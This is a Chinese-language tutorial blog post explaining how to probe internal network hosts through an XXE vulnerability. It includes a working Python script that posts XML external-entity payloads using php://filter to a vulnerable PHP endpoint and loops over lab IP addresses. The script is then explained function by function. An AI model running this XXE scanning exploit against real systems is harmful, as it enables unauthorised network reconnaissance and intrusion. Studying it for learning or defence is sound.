XXE漏洞大家也应该清楚了,不清楚可以看我的另两篇博客
https://blog.csdn.net/qq_41918771/article/details/103628721
https://blog.csdn.net/qq_41918771/article/details/103641745
内网主机探测
先上脚本
import requests
def build_xml(ip):
xml = "<?xml version='1.0' encoding='UTF-8'?>\n"
xml += "<!DOCTYPE xml[\n"
xml += "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=http://%s/'>\n"%ip
print(ip)
xml += "]>\n"
xml += "<xml>∫</xml>"
send_xml(xml)
def send_xml(data):
x = requests.post("http://192.168.34.69/3.php",data=data,timeout=3).text
print(x)
for i in range(65,70):
try:
ip = "192.168.34.%d"%i
build_xml(ip)
except:
continue
这实际上也就是判断内网主机的80端口是否开启。开启了判断为存活。
首先我们构造了一个build_xml函数,这个函数的作用是构造一个post的参数。
def build_xml(ip):
xml = "<?xml version='1.0' encoding='UTF-8'?>\n"
xml += "<!DOCTYPE xml[\n"
xml += "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=http://%s/'>\n"%ip
print(ip)
xml += "]>\n"
xml += "<xml>∫</xml>"
send_xml(xml)
其次是send_xml函数,这个函数用来发送。并接收结果
def send_xml(data):
x = requests.post("http://192.168.34.69/3.php",data=data,timeout=3).text
print(x)
然后主函数做循环
for i in range(1,255):
try:
ip = "192.168.34.%d"%i
build_xml(ip)
except:
continue
结果,方便演示,这里只探测了65到72的ip
成功在69获取到内容。
下面这句代码的意思是将http://ip/响应的内容进行base64编码。
php://filter/convert.base64-encode/resource=http://ip/'>
参考:https://xz.aliyun.com/t/3357#toc-11
